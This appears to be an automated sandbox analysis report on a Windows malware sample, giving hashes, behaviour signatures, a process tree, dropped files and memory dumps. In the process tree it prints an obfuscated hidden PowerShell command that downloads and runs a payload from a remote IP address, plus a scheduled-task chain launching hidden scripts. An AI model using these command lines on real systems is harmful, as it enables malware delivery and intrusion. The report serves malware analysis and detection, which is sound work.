2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935

General

Target

2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
Size

155KB
MD5

a2be5a2407107605033f2bd305be2e40
SHA1

0cc699e4c019627527777744903f75bc2494ef3a
SHA256

2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935
SHA512

ff211c693680df1ca81a7858dd647afc5cc0be093b985d9c3b20a1693bff069c260e66e2421b79e0711634baed2c6f12a1d905029e82e409c8368c0590bd9b6a
SSDEEP

768:8fvdWST3xRbyApqHuDlOHTjXhDnyokke5dfED1ns7csFOyh1cccccccccccgccc8:UvdWSVRVDlOzjRzrksAOUOMv

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1796 WScript.exe
5 2928 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

CONSOLEAPP1.EXE

pid process

1756 CONSOLEAPP1.EXE
Loads dropped DLL 1 IoCs

Processes:

2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe

pid process

2252 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe

flow	pid	process
3	1796	WScript.exe
5	2928	powershell.exe

pid	process
1756	CONSOLEAPP1.EXE

pid	process
2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2928 powershell.exe
1484 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2928 powershell.exe
Token: SeDebugPrivilege 1484 powershell.exe

pid	process
2928	powershell.exe
1484	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exeWScript.exetaskeng.exeWScript.execmd.exe

description	pid	process	target process
PID 2252 wrote to memory of 1756	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	CONSOLEAPP1.EXE
PID 2252 wrote to memory of 1756	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	CONSOLEAPP1.EXE
PID 2252 wrote to memory of 1756	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	CONSOLEAPP1.EXE
PID 2252 wrote to memory of 1756	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	CONSOLEAPP1.EXE
PID 2252 wrote to memory of 1796	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	WScript.exe
PID 2252 wrote to memory of 1796	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	WScript.exe
PID 2252 wrote to memory of 1796	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	WScript.exe
PID 2252 wrote to memory of 1796	2252	2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe	WScript.exe
PID 1796 wrote to memory of 2928	1796	WScript.exe	powershell.exe
PID 1796 wrote to memory of 2928	1796	WScript.exe	powershell.exe
PID 1796 wrote to memory of 2928	1796	WScript.exe	powershell.exe
PID 1796 wrote to memory of 2928	1796	WScript.exe	powershell.exe
PID 2336 wrote to memory of 956	2336	taskeng.exe	WScript.exe
PID 2336 wrote to memory of 956	2336	taskeng.exe	WScript.exe
PID 2336 wrote to memory of 956	2336	taskeng.exe	WScript.exe
PID 956 wrote to memory of 1932	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 1932	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 1932	956	WScript.exe	cmd.exe
PID 1932 wrote to memory of 1484	1932	cmd.exe	powershell.exe
PID 1932 wrote to memory of 1484	1932	cmd.exe	powershell.exe
PID 1932 wrote to memory of 1484	1932	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
"C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2252

C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
2⤵
- Executes dropped EXE
PID:1756

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSF"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://51.195.251.9:222/BR.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\system32\taskeng.exe
taskeng.exe {0A5749FC-6CBA-4C90-B743-E6A397CBAB01} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\Conted.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSF
Filesize
97KB

MD5
a704439ce9c5fc9b342e52019c4315cd

SHA1
fd846d13920c2d3b788f1e7c7d834ba208404c8a

SHA256
bb144eb973c93e0c9b19c52acc40c264e2fcc01518f7a2504d1f11b442f336f9

SHA512
e013ce483ce84bfee05f899fd2a317eb2930b41b4a3b14c4cc7efab9c69296580e9d2b2f05c8c55aff2e6cc5940e75f92f3fa3486a2b3e6d415be30d5be424e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K5OV5WNUKBXPH63OQ2W9.temp
Filesize
7KB

MD5
05bdb059f26dca7351c361fc70185894

SHA1
44f9e8a0edbec0282535562641d537e030ffe540

SHA256
b17ba6561916c8ce21a6635174ff109e098572bf50016aa4b97c857cf553ffee

SHA512
8075454a90514f3629401fdec7c8cc4d8e9a2aa8581a46b4503e33dcb7290f90b55c244f68e17d26f6840ded6cd8f248a3d18536ae58bb40a02690aca774877b

Download Submit
C:\Users\Public\Conted.bat
Filesize
199B

MD5
e70cce8b1110edb40612b5b14204f4b1

SHA1
c4872dc920d20cac95d65cd156d3df1da4e5e2c8

SHA256
e76c913a64800a5e756bfdacc103022bcb86e7f8477a8333387660166d161eba

SHA512
2a3b9fec13422465ee7b22745343ff5a0d3392a1185bdd239bf32d7df33a7722fab8cb71365889139eeb69aea8ea96c18317dd52863d841d2a3e75a0271a17c4

Download Submit
C:\Users\Public\Conted.ps1
Filesize
413KB

MD5
bb4b129eff0fe728ee25bc69e6b8cbf6

SHA1
8a6a8f635a1dc981b6fac51c5878b49049de8f03

SHA256
58388076dc83fa8c46e779e05ed29367671bebf8f8126ebd6295ebbdc81005af

SHA512
74dab8be440c209bf48d700c1c8dc75e22d946454dbf0fe1bdd3e5c190b7052b868a9bafdd12f46306f42332bd971fe3e0cf6514e88ecb45b865947aacb498b3

Download Submit
C:\Users\Public\Conted.vbs
Filesize
661B

MD5
b5e6dbc17075ec5f697166a10970ae47

SHA1
b858767affe1a38de4d191b3e56c0db0ae6f049a

SHA256
02e51e8b98e6eca20ee0869c44c62724cd287d70c6eed97bf13237feef9b436e

SHA512
f3d8198381aa76a8b7de66d81d310488535aac256d68b60739b5921895a6f7836404672990debe8e9f0d43a42f27a78d58e889314b9c82291646679b8969c1c3

Download Submit
\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
Filesize
4KB

MD5
3facc93eb70a073f208f90955fb055cb

SHA1
8f04cf5b9c9164f82b7e77034eee62396f6c5bf0

SHA256
608c73065d03ab7da0a0b8c8c3db3e073b2403a8d0249b9d684286f58e52dead

SHA512
269fb263dd7a2f383c2442a43e98435c4ee0767eab55c77ce5ff2e169089739e746f70208baaac2e4459076596a6afbf3fc8960d1ce9b8f46e91f7e462bd649c

Download Submit
memory/1484-39-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1484-41-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1484-36-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1484-38-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/1484-37-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1484-33-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/1484-34-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1484-35-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1756-15-0x00000000741B0000-0x000000007489E000-memory.dmp

Filesize
6.9MB

Download
memory/1756-11-0x00000000741B0000-0x000000007489E000-memory.dmp

Filesize
6.9MB

Download
memory/1756-10-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

Filesize
32KB

Download
memory/2928-18-0x00000000733B0000-0x000000007395B000-memory.dmp

Filesize
5.7MB

Download
memory/2928-26-0x00000000733B0000-0x000000007395B000-memory.dmp

Filesize
5.7MB

Download
memory/2928-22-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2928-21-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2928-20-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2928-19-0x00000000733B0000-0x000000007395B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing